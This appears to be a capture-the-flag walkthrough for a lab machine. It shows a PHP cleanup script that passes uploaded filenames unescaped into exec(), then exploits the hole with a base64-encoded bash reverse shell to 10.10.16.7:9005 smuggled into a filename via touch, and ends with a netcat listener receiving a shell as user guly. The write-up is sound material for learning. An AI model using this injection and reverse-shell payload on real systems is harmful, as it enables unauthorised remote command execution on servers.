5 check_attack.php
# file: lib.php
getnameCheck($value) | 10_10_16_7.php.png
=> same as before LITERALLY.
pieces = array(split on '.') | Array ( [0] => 10_10_16_7 [1] => php [2] => png )
name = pieces[0] | 10_10_16_7
name = replace '_' with '.' | 10.10.16.7
ext = join pieces with '.' after the removed 1st element | php.png
return name, ext
check_ip($name, $ext) | name=IP, ext=filename
check if name is an IP using FILTER_VALIDATE_IP
msg = filename
return true, msg
else =>
return false, attack on file <file>: not valid IP
loads all files in /var/www/html/uploads/
if file = 'index.html' => do nothing
getnameCheck() | returns name=IP, ext=extension
check = check_ip | returns true,filename
if check[0] is false,
create /tmp/attack.log with file contents
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
send mail $to $subject $msg $headers
# we control the parameter $value (the filename), which is interpolated unescaped into the exec() string above
# tried running this file locally on any newly created file
# the IP gets broken because the filename is split on '.' (name = everything before the first '.')
# base64
$ echo -n 'bash -c "bash -i >/dev/tcp/10.10.16.7/9005 0>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi
$ touch -- ';echo YmFzaCAtYyAiYmFzaCAtaSA+L2Rldi90Y3AvMTAuMTAuMTYuNy85MDA1IDA+JjEi|base64 -d | bash'
$ nc -lvnp 9005
listening on [any] 9005 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.146] 34270
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
whoami
guly